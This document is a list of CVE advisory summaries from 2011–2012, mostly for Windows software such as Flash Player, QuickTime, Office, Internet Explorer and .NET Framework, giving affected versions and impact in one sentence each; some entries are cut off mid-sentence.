ActiveX control in Adobe Flash Player before 10.3.183.15 and 11.x before 11.1.102.62 on Windows allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors. [CVE-2012-0733] IBM Rational AppScan Enterprise 5.x and 8.x before 8.5.0.1, when Integrated Windows authentication is used, allows remote authenticated users to obtain administrative privileges by hijacking a session associated with the service account. [CVE-2012-0713] Unspecified vulnerability in the XML feature in IBM DB2 9.7 before FP6 on Linux, UNIX, and Windows allows remote authenticated users to read arbitrary XML files via unknown vectors. [CVE-2012-0669] Buffer overflow in Apple QuickTime before 7.7.2 on Windows allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted movie file with Sorenson encoding. [CVE-2012-0667] Integer signedness error in Apple QuickTime before 7.7.2 on Windows allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted QTVR movie file. [CVE-2012-0666] Stack-based buffer overflow in the plugin in Apple QuickTime before 7.7.2 on Windows allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted QTMovie object. [CVE-2012-0664] Heap-based buffer overflow in Apple QuickTime before 7.7.2 on Windows allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted text track in a movie file. [CVE-2012-0663] Multiple stack-based buffer overflows in Apple QuickTime before 7.7.2 on Windows allow remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted TeXML file. [CVE-2012-0584] The Internationalized Domain Name (IDN) feature in Apple Safari before 5.1.4 on Windows does not properly restrict the characters in URLs, which allows remote attackers to spoof a domain name via unspecified homoglyphs. [CVE-2012-0519] Unspecified vulnerability in the Core RDBMS component in Oracle Database Server 11.2.0.2, when running on Windows, allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors. [CVE-2012-0472] The cairo-dwrite implementation in Mozilla Firefox 4.x through 11.0, Firefox ESR 10.x before 10.0.4, Thunderbird 5.0 through 11.0, Thunderbird ESR 10.x before 10.0.4, and SeaMonkey before 2.9, when certain Windows Vista and Windows 7 configurations are used, does not properly restrict font-rendering attempts, which allows remote attackers to cause a denial of service (memory corruption) or possibly execute arbitrary code via unspecified vectors. [CVE-2012-0454] Use-after-free vulnerability in Mozilla Firefox 4.x through 10.0, Firefox ESR 10.x before 10.0.3, Thunderbird 5.0 through 10.0, Thunderbird ESR 10.x before 10.0.3, and SeaMonkey before 2.8 on 32-bit Windows 7 platforms allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via vectors involving use of the file-open dialog in a child window, related to the IUnknown_QueryService function in the Windows shlwapi.dll library. [CVE-2012-0447] Mozilla Firefox 4.x through 9.0, Thunderbird 5.0 through 9.0, and SeaMonkey before 2.7 do not properly initialize data for image/vnd.microsoft.icon images, which allows remote attackers to obtain potentially sensitive information by reading a PNG image that was created through conversion from an ICO image. [CVE-2012-0430] Unspecified vulnerability in NetIQ eDirectory 8.8.6.x before 8.8.6.7 and 8.8.7.x before 8.8.7.2 on Windows allows remote attackers to obtain an administrator cookie and bypass authorization checks via unknown vectors. [CVE-2012-0429] dhost in NetIQ eDirectory 8.8.6.x before 8.8.6.7 and 8.8.7.x before 8.8.7.2 on Windows allows remote authenticated users to cause a denial of service (daemon crash) via crafted characters in an HTTP request. [CVE-2012-0418] Unspecified vulnerability in the client in Novell GroupWise 8.0 before Support Pack 3 and 2012 before Support Pack 1 on Windows allows user-assisted remote attackers to execute arbitrary code via a crafted file. [CVE-2012-0265] Stack-based buffer overflow in Apple QuickTime before 7.7.2 on Windows allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted pathname for a file. [CVE-2012-0185] Heap-based buffer overflow in Microsoft Excel 2007 SP2 and SP3 and 2010 Gold and SP1, Excel Viewer, and Office Compatibility Pack SP2 and SP3 allows remote attackers to execute arbitrary code via a crafted spreadsheet that triggers incorrect handling of memory during opening, aka "Excel MergeCells Record Heap Overflow Vulnerability." [CVE-2012-0184] Microsoft Excel 2003 SP3, 2007 SP2 and SP3, and 2010 Gold and SP1 [CVE-2012-0183] Microsoft Word 2003 SP3 and 2007 SP2 and SP3, Office 2008 and 2011 for Mac, and Office Compatibility Pack SP2 and SP3 allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted RTF data, aka "RTF Mismatch Vulnerability." [CVE-2012-0182] Microsoft Word 2007 SP2 and SP3 does not properly handle memory during the parsing of Word documents, which allows remote attackers to execute arbitrary code via a crafted document, aka "Word PAPX Section Corruption Vulnerability." [CVE-2012-0177] Heap-based buffer overflow in the Office Works File Converter in Microsoft Office 2007 SP2, Works 9, and Works 6-9 File Converter allows remote attackers to execute arbitrary code via a crafted Works (aka .wps) file, aka "Office WPS Converter Heap Overflow Vulnerability." [CVE-2012-0172] Microsoft Internet Explorer 6 through 8 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing a deleted object, aka "VML Style Remote Code Execution Vulnerability." [CVE-2012-0171] Microsoft Internet Explorer 6 through 9 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing a deleted object, aka "SelectAll Remote Code Execution Vulnerability." [CVE-2012-0170] Microsoft Internet Explorer 6 and 7 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing a deleted object, aka "OnReadyStateChange Remote Code Execution Vulnerability." [CVE-2012-0169] Microsoft Internet Explorer 9 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing a deleted object, aka "JScript9 Remote Code Execution Vulnerability." [CVE-2012-0168] Microsoft Internet Explorer 6 through 9 allows user-assisted remote attackers to execute arbitrary code via a crafted HTML document that is not properly handled during a "Print table of links" print operation, aka "Print Feature Remote Code Execution Vulnerability." [CVE-2012-0167] Heap-based buffer overflow in the Office GDI+ library in Microsoft Office 2003 SP3 and 2007 SP2 and SP3 allows remote attackers to execute arbitrary code via a crafted EMF image in an Office document, aka "GDI+ Heap Overflow Vulnerability." [CVE-2012-0163] Microsoft .NET Framework 1.0 SP3, 1.1 SP1, 2.0 SP2, 3.5, 3.5.1, 4, and 4.5 does not properly validate function parameters, which allows remote attackers to execute arbitrary code via (1) a crafted XAML browser application (aka XBAP), (2) a crafted ASP.NET application, or (3) a crafted .NET Framework application, aka ".NET Framework Parameter Validation Vulnerability." [CVE-2012-0162] Microsoft .NET Framework 4 does not properly allocate buffers, which allows remote attackers to execute arbitrary code via (1) a crafted XAML browser application (aka XBAP) or (2) a crafted .NET Framework application, aka ".NET Framework Buffer Allocation Vulnerability." [CVE-2012-0161] Microsoft .NET Framework 1.0 SP3, 1.1 SP1, 2.0 SP2, 3.0 SP2, 3.5 SP1, 3.5.1, and 4 does not properly handle an unspecified exception during use of partially trusted assemblies to serialize input data, which allows remote attackers to execute arbitrary code via (1) a crafted XAML browser application (aka XBAP) or (2) a crafted .NET Framework application, aka ".NET Framework Serialization Vulnerability." [CVE-2012-0160] Microsoft .NET Framework 1.0 SP3, 1.1 SP1, 2.0 SP2, 3.0 SP2, 3.5 SP1, 3.5.1, and 4 does not properly serialize input data, which allows remote attackers to execute arbitrary code via (1) a crafted XAML browser application (aka XBAP) or (2) a crafted .NET Framework application, aka ".NET Framework Serialization Vulnerability." [CVE-2012-0158] The (1) ListView, (2) ListView2, (3) TreeView, and (4) TreeView2 ActiveX controls in MSCOMCTL.OCX in the Common Controls in Microsoft Office 2003 SP3, 2007 SP2 and SP3, and 2010 Gold and SP1 [CVE-2012-0155] Microsoft Internet Explorer 9 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing a deleted object, aka "VML Remote Code Execution Vulnerability." [CVE-2012-0147] Microsoft Forefront Unified Access Gateway (UAG) 2010 SP1 and SP1 Update 1 does not properly configure the default web site, which allows remote attackers to obtain sensitive information via a crafted HTTPS request, aka "Unfiltered Access to UAG Default Website Vulnerability." [CVE-2012-0146] Open redirect vulnerability in Microsoft Forefront Unified Access Gateway (UAG) 2010 SP1 and SP1 Update 1 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a crafted URL, aka "UAG Blind HTTP Redirect Vulnerability." [CVE-2012-0145] Cross-site scripting (XSS) vulnerability in wizardlist.aspx in Microsoft Office SharePoint Server 2010 Gold and SP1 and SharePoint Foundation 2010 Gold and SP1 allows remote attackers to inject arbitrary web script or HTML via JavaScript sequences in a URL, aka "XSS in wizardlist.aspx Vulnerability." [CVE-2012-0144] Cross-site scripting (XSS) vulnerability in themeweb.aspx in Microsoft Office SharePoint Server 2010 Gold and SP1 and SharePoint Foundation 2010 Gold and SP1 allows remote attackers to inject arbitrary web script or HTML via JavaScript sequences in a URL, aka "XSS in themeweb.aspx Vulnerability." [CVE-2012-0143] Microsoft Excel 2003 SP3 and Office 2008 for Mac do not properly handle memory during the opening of files, which allows remote attackers to execute arbitrary code via a crafted spreadsheet, aka "Excel Memory Corruption Using Various Modified Bytes Vulnerability." [CVE-2012-0142] Microsoft Excel 2003 SP3, 2007 SP2 and SP3, and 2010 Gold and SP1 [CVE-2012-0141] Microsoft Excel 2003 SP3, 2007 SP2 and SP3, and 2010 Gold and SP1 [CVE-2012-0138] Microsoft Visio Viewer 2010 Gold and SP1 does not properly handle memory during the parsing of files, which allows remote attackers to execute arbitrary code via crafted attributes in a Visio file, aka "VSD File Format Memory Corruption Vulnerability," a different vulnerability than CVE-2012-0019, CVE-2012-0020, CVE-2012-0136, and CVE-2012-0137. [CVE-2012-0137] Microsoft Visio Viewer 2010 Gold and SP1 does not properly handle memory during the parsing of files, which allows remote attackers to execute arbitrary code via crafted attributes in a Visio file, aka "VSD File Format Memory Corruption Vulnerability," a different vulnerability than CVE-2012-0019, CVE-2012-0020, CVE-2012-0136, and CVE-2012-0138. [CVE-2012-0136] Microsoft Visio Viewer 2010 Gold and SP1 does not properly handle memory during the parsing of files, which allows remote attackers to execute arbitrary code via crafted attributes in a Visio file, aka "VSD File Format Memory Corruption Vulnerability," a different vulnerability than CVE-2012-0019, CVE-2012-0020, CVE-2012-0137, and CVE-2012-0138. [CVE-2012-0105] Unspecified vulnerability in the Oracle VM VirtualBox component in Oracle Virtualization 4.1 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Windows Guest Additions. [CVE-2012-0020] Microsoft Visio Viewer 2010 Gold and SP1 does not properly handle memory during the parsing of files, which allows remote attackers to execute arbitrary code via crafted attributes in a Visio file, aka "VSD File Format Memory Corruption Vulnerability," a different vulnerability than CVE-2012-0019, CVE-2012-0136, CVE-2012-0137, and CVE-2012-0138. [CVE-2012-0019] Microsoft Visio Viewer 2010 Gold and SP1 does not properly handle memory during the parsing of files, which allows remote attackers to execute arbitrary code via crafted attributes in a Visio file, aka "VSD File Format Memory Corruption Vulnerability," a different vulnerability than CVE-2012-0020, CVE-2012-0136, CVE-2012-0137, and CVE-2012-0138. [CVE-2012-0018] Microsoft Visio Viewer 2010 Gold and SP1 does not properly validate attributes in Visio files, which allows remote attackers to execute arbitrary code via a crafted file, aka "VSD File Format Memory Corruption Vulnerability." [CVE-2012-0017] Cross-site scripting (XSS) vulnerability in inplview.aspx in Microsoft SharePoint Foundation 2010 Gold and SP1 allows remote attackers to inject arbitrary web script or HTML via JavaScript sequences in a URL, aka "XSS in inplview.aspx Vulnerability." [CVE-2012-0016] Untrusted search path vulnerability in Microsoft Expression Design [CVE-2012-0015] Microsoft .NET Framework 2.0 SP2 and 3.5.1 does not properly calculate the length of an unspecified buffer, which allows remote attackers to execute arbitrary code via (1) a crafted XAML browser application (aka XBAP), (2) a crafted ASP.NET application, or (3) a crafted .NET Framework application, aka ".NET Framework Heap Corruption Vulnerability." [CVE-2012-0014] Microsoft .NET Framework 2.0 SP2, 3.5.1, and 4, and Silverlight 4 before 4.1.10111, does not properly restrict access to memory associated with unmanaged objects, which allows remote attackers to execute arbitrary code via (1) a crafted XAML browser application (aka XBAP), (2) a crafted ASP.NET application, (3) a crafted .NET Framework application, or (4) a crafted Silverlight application, aka ".NET Framework Unmanaged Objects Vulnerability." [CVE-2012-0012] Microsoft Internet Explorer 9 does not properly handle the creation and initialization of string objects, which allows remote attackers to read data from arbitrary process-memory locations via a crafted web site, aka "Null Byte Information Disclosure Vulnerability." [CVE-2012-0011] Microsoft Internet Explorer 7 through 9 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing a deleted object, aka "HTML Layout Remote Code Execution Vulnerability." [CVE-2012-0010] Microsoft Internet Explorer 6 through 9 does not properly perform copy-and-paste operations, which allows user-assisted remote attackers to read content from a different (1) domain or (2) zone via a crafted web site, aka "Copy and Paste Information Disclosure Vulnerability." [CVE-2012-0008] Untrusted search path vulnerability in Microsoft Visual Studio 2008 SP1, 2010, and 2010 SP1 allows local users to gain privileges via a Trojan horse add-in in an unspecified directory, aka "Visual Studio Add-In Vulnerability." [CVE-2012-0007] The Microsoft Anti-Cross Site Scripting (AntiXSS) Library 3.x and 4.0 does not properly evaluate characters after the detection of a Cascading Style Sheets (CSS) escaped character, which allows remote attackers to conduct cross-site scripting (XSS) attacks via HTML input, aka "AntiXSS Library Bypass Vulnerability." [CVE-2011-5127] Directory traversal vulnerability in Blue Coat Reporter 9.x before 9.2.4.13, 9.2.5.x before 9.2.5.1, and 9.3 before 9.3.1.2 on Windows allows remote attackers to read arbitrary files, and consequently execute arbitrary code, via an unspecified HTTP request. [CVE-2011-5049] MySQL 5.5.8, when running on Windows, allows remote attackers to cause a denial of service (NULL pointer dereference) via a crafted packet to TCP port 3306. [CVE-2011-5012] Heap-based buffer overflow in the Reflection FTP Client (rftpcom.dll 7.2.0.106 and possibly other versions), as used in Attachmate Reflection 2008, Reflection 2011 R1 before 15.3.2.569 and R1 SP1 before, Reflection 2011 R2 before 15.4.1.327, Reflection Windows Client 7.2 SP1 before hotfix 7.2.1186, and Reflection 14.1 SP1 before 14.1.1.206 allows remote FTP servers to execute arbitrary code via a long directory name in a response to a LIST command. [CVE-2011-4963] nginx/Windows 1.3.x before 1.3.1 and 1.2.x before 1.2.1 allows remote attackers to bypass intended access restrictions and access restricted files via (1) a trailing . (dot) or (2) certain "$index_allocation" sequences in a request. [CVE-2011-4694] Unspecified vulnerability in Adobe Flash Player 11.1.102.55 on Windows and Mac OS X allows remote attackers to execute arbitrary code via a crafted SWF file, as demonstrated by the second of two vulnerabilities exploited by the Intevydis vd_adobe_fp module in VulnDisco Step Ahead (SA). NOTE: as of 20111207, this disclosure has no actionable information. However, because the module author is a reliable researcher, the issue is being assigned a CVE identifier for tracking purposes. [CVE-2011-4693] Unspecified vulnerability in Adobe Flash Player 11.1.102.55 on Windows and Mac OS X allows remote attackers to execute arbitrary code via a crafted SWF file, as demonstrated by the first of two vulnerabilities exploited by the Intevydis vd_adobe_fp module in VulnDisco Step Ahead (SA). NOTE: as of 20111207, this disclosure has no actionable information. However, because the module author is a reliable researcher, the issue is being assigned a CVE identifier for tracking purposes. [CVE-2011-4689] Microsoft Internet Explorer 6 through 9 does not prevent capture of data about the times of Same Origin Policy violations during IFRAME loading attempts, which makes it easier for remote attackers to determine whether a document exists in the browser cache via crafted JavaScript code. [CVE-2011-4373] Adobe Reader and Acrobat before 9.5, and 10.x before 10.1.2, on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2011-4370 and CVE-2011-4372. [CVE-2011-4372] Adobe Reader and Acrobat before 9.5, and 10.x before 10.1.2, on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2011-4370 and CVE-2011-4373. [CVE-2011-4371] Adobe Reader and Acrobat before 9.5, and 10.x before 10.1.2, on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (heap memory corruption) via unspecified vectors. [CVE-2011-4370] Adobe Reader and Acrobat before 9.5, and 10.x before 10.1.2, on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2011-4372 and CVE-2011-4373. [CVE-2011-4369] Unspecified vulnerability in the PRC component in Adobe Reader and Acrobat 9.x before 9.4.7 on Windows, Adobe Reader and Acrobat 9.x through 9.4.6 on Mac OS X, Adobe Reader and Acrobat 10.x through 10.1.1 on Windows and Mac OS X, and Adobe Reader 9.x through 9.4.6 on UNIX allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via unknown vectors, as exploited in the wild in December 2011. [CVE-2011-4187] Buffer overflow in the GetDriverSettings function in nipplib.dll in Novell iPrint Client before 5.78 on Windows allows remote attackers to execute arbitrary code via a long realm field, a different vulnerability than CVE-2011-3173. [CVE-2011-4186] Heap-based buffer overflow in nipplib.dll in Novell iPrint Client before 5.78 on Windows allows remote attackers to execute arbitrary code via a crafted client-file-name parameter in a printer-url, a different vulnerability than CVE-2011-1705. [CVE-2011-4185] The GetPrinterURLList2 method in the ActiveX control in Novell iPrint Client before 5.78 on Windows allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2008-2431 and CVE-2008-2436. [CVE-2011-3649] Mozilla Firefox 7.0 and Thunderbird 7.0, when the Direct2D (aka D2D) API is used on Windows in conjunction with the Azure graphics back-end, allow remote attackers to bypass the Same Origin Policy, and obtain sensitive image data from a different domain, by inserting this data into a canvas. NOTE: this issue exists because of a CVE-2011-2986 regression. [CVE-2011-3640] DISPUTED Untrusted search path vulnerability in Mozilla Network Security Services (NSS), as used in Google Chrome before 17 on Windows and Mac OS X, might allow local users to gain privileges via a Trojan horse pkcs11.txt file in a top-level directory. NOTE: the vendor's response was "Strange behavior, but we're not treating this as a security bug." [CVE-2011-3516] Unspecified vulnerability in the Java Runtime Environment component in Oracle Java SE JDK and JRE 6 Update 27 and earlier, when running on Windows, allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality, integrity, and availability via unknown vectors related to Deployment. [CVE-2011-3417] The Forms Authentication feature in the ASP.NET subsystem in Microsoft .NET Framework 1.1 SP1, 2.0 SP2, 3.5 SP1, 3.5.1, and 4.0, when sliding expiry is enabled, does not properly handle cached content, which allows remote attackers to obtain access to arbitrary user accounts via a crafted URL, aka "ASP.NET Forms Authentication Ticket Caching Vulnerability." [CVE-2011-3416] The Forms Authentication feature in the ASP.NET subsystem in Microsoft .NET Framework 1.1 SP1, 2.0 SP2, 3.5 SP1, 3.5.1, and 4.0 allows remote authenticated users to obtain access to arbitrary user accounts via a crafted username, aka "ASP.Net Forms Authentication Bypass Vulnerability." [CVE-2011-3415] Open redirect vulnerability in the Forms Authentication feature in the ASP.NET subsystem in Microsoft .NET Framework 2.0 SP2, 3.5 SP1, 3.5.1, and 4.0 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a crafted return URL, aka "Insecure Redirect in .NET Form Authentication Vulnerability." [CVE-2011-3414] The CaseInsensitiveHashProvider.getHashCode function in the HashTable implementation in the ASP.NET subsystem in Microsoft .NET Framework 1.1 SP1, 2.0 SP2, 3.5 SP1, 3.5.1, and 4.0 computes hash values for form parameters without restricting the ability to trigger hash collisions predictably, which allows remote attackers to cause a denial of service (CPU consumption) by sending many crafted parameters, aka "Collisions in HashTable May Cause DoS Vulnerability." [CVE-2011-3413] Microsoft PowerPoint 2007 SP2 [CVE-2011-3412] Microsoft Publisher 2003 SP3, and 2007 SP2 and SP3, allows remote attackers to execute arbitrary code via a crafted Publisher file that leverages incorrect memory handling, aka "Publisher Memory Corruption Vulnerability." [CVE-2011-3411] Microsoft Publisher 2003 SP3 allows remote attackers to execute arbitrary code via a crafted Publisher file that leverages incorrect handling of values in memory, aka "Publisher Invalid Pointer Vulnerability." [CVE-2011-3410] Array index error in Microsoft Publisher 2003 SP3, and 2007 SP2 and SP3, allows remote attackers to execute arbitrary code via a crafted Publisher file that leverages incorrect handling of values in memory, aka "Publisher Out-of-bounds Array Index Vulnerability." [CVE-2011-3404] Microsoft Internet Explorer 6 through 9 does not properly use the Content-Disposition HTTP header to control rendering of the HTTP response body, which allows remote attackers to read content from a different (1) domain or (2) zone via a crafted web site, aka "Content-Disposition Information Disclosure Vulnerability." [CVE-2011-3403] Microsoft Excel 2003 SP3 and Office 2004 for Mac do not properly handle objects in memory, which allows remote attackers to execute arbitrary code via a crafted Excel spreadsheet, aka "Record Memory Corruption Vulnerability." [CVE-2011-3396] Untrusted search path vulnerability in Microsoft PowerPoint 2007 SP2 and 2010 allows local users to gain privileges via a Trojan horse DLL in the current working directory, aka "PowerPoint Insecure Library Loading Vulnerability." [CVE-2011-3330] Buffer overflow in the UnitelWay Windows Device Driver, as used in Schneider Electric Unity Pro 6 and earlier, OPC Factory Server 3.34, Vijeo Citect 7.20 and earlier, Telemecanique Driver Pack 2.6 and earlier, Monitor Pro 7.6 and earlier, and PL7 Pro 4.5 and earlier, allows local users, and possibly remote attackers, to execute arbitrary code via an unspecified system parameter. [CVE-2011-3310] The Home Page component in Cisco CiscoWorks Common Services before 4.1 on Windows, as used in CiscoWorks LAN Management Solution, Cisco Security Manager, Cisco Unified Service Monitor, Cisco Unified Operations Manager, CiscoWorks QoS Policy Manager, and CiscoWorks Voice Manager, allows remote authenticated users to execute arbitrary commands via a crafted URL, aka Bug IDs CSCtq48990, CSCtq63992, CSCtq64011, CSCtq64019, CSCtr23090, and CSCtt25535. [CVE-2011-3260] Buffer overflow in OfficeImport in Apple iOS before 5 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted Microsoft Word document. [CVE-2011-3251] Apple QuickTime before 7.7.1 on Windows allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via crafted TKHD atoms in a QuickTime movie file. [CVE-2011-3247] Integer overflow in Apple QuickTime before 7.7.1 on Windows allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted PICT file. [CVE-2011-3243] Cross-site scripting (XSS) vulnerability in WebKit, as used in Apple iOS before 5 and Safari before 5.1.1, allows remote attackers to inject arbitrary web script or HTML via vectors involving inactive DOM windows. [CVE-2011-3185] gtkutils.c in Pidgin before 2.10.0 on Windows allows user-assisted remote attackers to execute arbitrary programs via a file: URL in a message. [CVE-2011-3098] Google Chrome before 19.0.1084.46 on Windows uses an incorrect search path for the Windows Media Player plug-in, which might allow local users to gain privileges via a Trojan horse plug-in in an unspecified directory. [CVE-2011-3072] Google Chrome before 18.0.1025.151 allows remote attackers to bypass the Same Origin Policy via vectors related to pop-up windows. [CVE-2011-2986] Mozilla Firefox 4.x through 5, Thunderbird before 6, SeaMonkey 2.x before 2.3, and possibly other products, when the Direct2D (aka D2D) API is used on Windows, allows remote attackers to bypass the Same Origin Policy, and obtain sensitive image data from a different domain, by inserting this data into a canvas. [CVE-2011-2977] Bugzilla 3.6.x before 3.6.6, 3.7.x, 4.0.x before 4.0.2, and 4.1.x before 4.1.3 on Windows does not delete the temporary files associated with uploaded attachments, which allows local users to obtain sensitive information by reading these files. NOTE: this issue exists because of a regression in 3.6. [CVE-2011-2836] Google Chrome before 14.0.835.163 does not require Infobar interaction before use of the Windows Media Player plug-in, which makes it easier for remote attackers to have an unspecified impact via crafted Flash content. [CVE-2011-2822] Google Chrome before 13.0.782.215 on Windows does not properly parse URLs located on the command line, which has unspecified impact and attack vectors. [CVE-2011-2806] Google Chrome before 13.0.782.215 on Windows does not properly handle vertex data, which allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors. [CVE-2011-2779] Windows Event Log SmartConnector in HP ArcSight Connector Appliance before 6.1 uses world-writable permissions for exported report files, which allows local users to change or delete log data by modifying a file, a different vulnerability than CVE-2011-0770. [CVE-2011-2712] Cross-site scripting (XSS) vulnerability in Apache Wicket 1.4.x before 1.4.18, when setAutomaticMultiWindowSupport is enabled, allows remote attackers to inject arbitrary web script or HTML via unspecified parameters. [CVE-2011-2678] The Cisco VPN Client 5.0.7.0240 and 5.0.7.0290 on 64-bit Windows platforms uses weak permissions (NT AUTHORITY\INTERACTIVE:F) for cvpnd.exe, which allows local users to gain privileges by replacing this executable file with an arbitrary program, aka Bug ID CSCtn50645. NOTE: this vulnerability exists because of a CVE-2007-4415 regression. [CVE-2011-2664] Unspecified vulnerability in Check Point Multi-Domain Management / Provider-1 NGX R65, R70, R71, and R75, and SmartCenter during installation on non-Windows machines, allows local users on the MDS system to overwrite arbitrary files via unknown vectors. [CVE-2011-2618] Opera before 11.50 allows remote attackers to cause a denial of service (application crash) via web script that moves a (1) AUDIO element or (2) VIDEO element between windows. [CVE-2011-2617] Unspecified vulnerability in Opera before 11.50 allows remote attackers to cause a denial of service (application crash) via vectors related to selecting a text node, and closed pop-up windows, removed pop-up windows, and IFRAME elements. [CVE-2011-2604] The Intel G41 driver 6.14.10.5355 on Windows XP SP3 allows remote attackers to cause a denial of service (system crash) via a crafted web page that is visited with Google Chrome or Mozilla Firefox, as demonstrated by the lots-of-polys-example.html test page in the Khronos WebGL SDK. [CVE-2011-2602] The NVIDIA Geforce 310 driver 6.14.12.7061 on Windows XP SP3 allows remote attackers to cause a denial of service (system crash) via a crafted web page that is visited with Google Chrome or Mozilla Firefox, as demonstrated by the lots-of-polys-example.html test page in the Khronos WebGL SDK. [CVE-2011-2600] The GPU support functionality in Windows XP does not properly restrict rendering time, which allows remote attackers to cause a denial of service (system crash) via vectors involving WebGL and (1) shader programs or (2) complex 3D geometry, as demonstrated by using Mozilla Firefox or Google Chrome to visit the lots-of-polys-example.html test page in the Khronos WebGL SDK. [CVE-2011-2598] The WebGL implementation in Mozilla Firefox 4.x allows remote attackers to obtain screenshots of the windows of arbitrary desktop applications via vectors involving an SVG filter, an IFRAME element, and uninitialized data in graphics memory. [CVE-2011-2462] Unspecified vulnerability in the U3D component in Adobe Reader and Acrobat 10.1.1 and earlier on Windows and Mac OS X, and Adobe Reader 9.x through 9.4.6 on UNIX, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via unknown vectors, as exploited in the wild in December 2011. [CVE-2011-2460] Adobe Flash Player before 10.3.183.11 and 11.x before 11.1.102.55 on Windows, Mac OS X, Linux, and Solaris and before 11.1.102.59 on Android, and Adobe AIR before 3.1.0.4880, allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2011-2445, CVE-2011-2451, CVE-2011-2452, CVE-2011-2453, CVE-2011-2454, CVE-2011-2455, and CVE-2011-2459. [CVE-2011-2459] Adobe Flash Player before 10.3.183.11 and 11.x before 11.1.102.55 on Windows, Mac OS X, Linux, and Solaris and before 11.1.102.59 on Android, and Adobe AIR before 3.1.0.4880, allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2011-2445, CVE-2011-2451, CVE-2011-2452, CVE-2011-2453, CVE-2011-2454, CVE-2011-2455, and CVE-2011-2460. [CVE-2011-2458] Adobe Flash Player before 10.3.183.11 and 11.x before 11.1.102.55 on Windows, Mac OS X, Linux, and Solaris and before 11.1.102.59 on Android, and Adobe AIR before 3.1.0.4880, when Internet Explorer is used, allows remote attackers to bypass the cross-domain policy via a crafted web site. [CVE-2011-2457] Stack-based buffer overflow in Adobe Flash Player before 10.3.183.11 and 11.x before 11.1.102.55 on Windows, Mac OS X, Linux, and Solaris and before 11.1.102.59 on Android, and Adobe AIR before 3.1.0.4880, allows attackers to execute arbitrary code via unspecified vectors. [CVE-2011-2456] Buffer overflow in Adobe Flash Player before 10.3.183.11 and 11.x before 11.1.102.55 on Windows, Mac OS X, Linux, and Solaris and before 11.1.102.59 on Android, and Adobe AIR before 3.1.0.4880, allows attackers to execute arbitrary code via unspecified vectors. [CVE-2011-2455] Adobe Flash Player before 10.3.183.11 and 11.x before 11.1.102.55 on Windows, Mac OS X, Linux, and Solaris and before 11.1.102.59 on Android, and Adobe AIR before 3.1.0.4880, allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2011-2445, CVE-2011-2451, CVE-2011-2452, CVE-2011-2453, CVE-2011-2454, CVE-2011-2459, and CVE-2011-2460. [CVE-2011-2454] Adobe Flash Player before 10.3.183.11 and 11.x before 11.1.102.55 on Windows, Mac OS X, Linux, and Solaris and before 11.1.102.59 on Android, and Adobe AIR before 3.1.0.4880, allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2011-2445, CVE-2011-2451, CVE-2011-2452, CVE-2011-2453, CVE-2011-2455, CVE-2011-2459, and CVE-2011-2460. [CVE-2011-2453] Adobe Flash Player before 10.3.183.11 and 11.x before 11.1.102.55 on Windows, Mac OS X, Linux, and Solaris and before 11.1.102.59 on Android, and Adobe AIR before 3.1.0.4880, allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2011-2445, CVE-2011-2451, CVE-2011-2452, CVE-2011-2454, CVE-2011-2455, CVE-2011-2459, and CVE-2011-2460. [CVE-2011-2452] Adobe Flash Player before 10.3.183.11 and 11.x before 11.1.102.55 on Windows, Mac OS X, Linux, and Solaris and before 11.1.102.59 on Android, and Adobe AIR before 3.1.0.4880, allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2011-2445, CVE-2011-2451, CVE-2011-2453, CVE-2011-2454, CVE-2011-2455, CVE-2011-2459, and CVE-2011-2460. [CVE-2011-2451] Adobe Flash Player before 10.3.183.11 and 11.x before 11.1.102.55 on Windows, Mac OS X, Linux, and Solaris and before 11.1.102.59 on Android, and Adobe AIR before 3.1.0.4880, allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2011-2445, CVE-2011-2452, CVE-2011-2453, CVE-2011-2454, CVE-2011-2455, CVE-2011-2459, and CVE-2011-2460. [CVE-2011-2450] Adobe Flash Player before 10.3.183.11 and 11.x before 11.1.102.55 on Windows, Mac OS X, Linux, and Solaris and before 11.1.102.59 on Android, and Adobe AIR before 3.1.0.4880, allows 